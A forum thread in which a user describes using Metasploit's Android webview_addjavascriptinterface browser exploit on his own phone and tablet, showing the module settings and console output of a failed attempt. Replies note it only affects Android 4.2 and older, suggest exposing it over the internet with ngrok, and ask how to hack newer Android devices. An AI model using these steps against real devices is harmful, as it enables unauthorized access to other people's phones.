So I tried getting into my Android device (phone & tablet but it still didn't work) I'll post here what I did:
- I ran Metasploit
- Used this exploit "use exploit /android/browser/webview_addjavascriptinterface".
- I set my LHOST to the IP ADRESS on Kali (ifconfig)
- Set URIPATH: Security
- Exploit.
- Got my Local IP "http://192.168.X.X:8080/Security " I even tried the "Using URL" (http://0.0.0.0:8080/Security) but it didn't work.
7.All I got was:
msf exploit(webview_addjavascriptinterface) > * Using URL: http://0.0.0.0:8080/Security
* Local IP: http://192.168.X.X:8080/Security
* Server started.
* 192.168.X.1 webview_addjavascriptinterface - Gathering target information for 192.168.X.1
* 192.168.X.1 webview_addjavascriptinterface - Sending HTML response to 192.168.X.1
! 192.168.X.1 webviewaddjavascriptinterface - Exploit requirement(s) not met: vulntest. For more info: http://r-7.co/PVbcgx
! 192.168.X.1 webview_addjavascriptinterface - No vulnerable Java objects were found in this web context.
9 Responses
If your device is not vulnerable, it's not going to work. This specific exploit uses a 2012 vulnerability in Android 4.2 and lower. Here's some info about it. https://www.rapid7.com/db/modules/exploit/android/browser/webview_addjavascriptinterface
So what if the target is an Android 5.2 or higher?
And i also discovered that they must be on the same network connection before it will work.
same problem???????? I used above suggestion but it also does not work
you can use it on wan using http ngrok but you can't hack any android device,must be under 4.2 android version
im using an emulator android version 4.0 still not working , any ideas ?
yeah
but its works only on LAN
I get this error
Exploit failed bad-config: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:8080)
Type
lsof -t -i:port number(4444 or 8080)
It will show u service number like"1508"
Kill that service by typing..
Kill 1508(service number)
any other way to hack android 5.0 and above , not by sending payload
Share Your Thoughts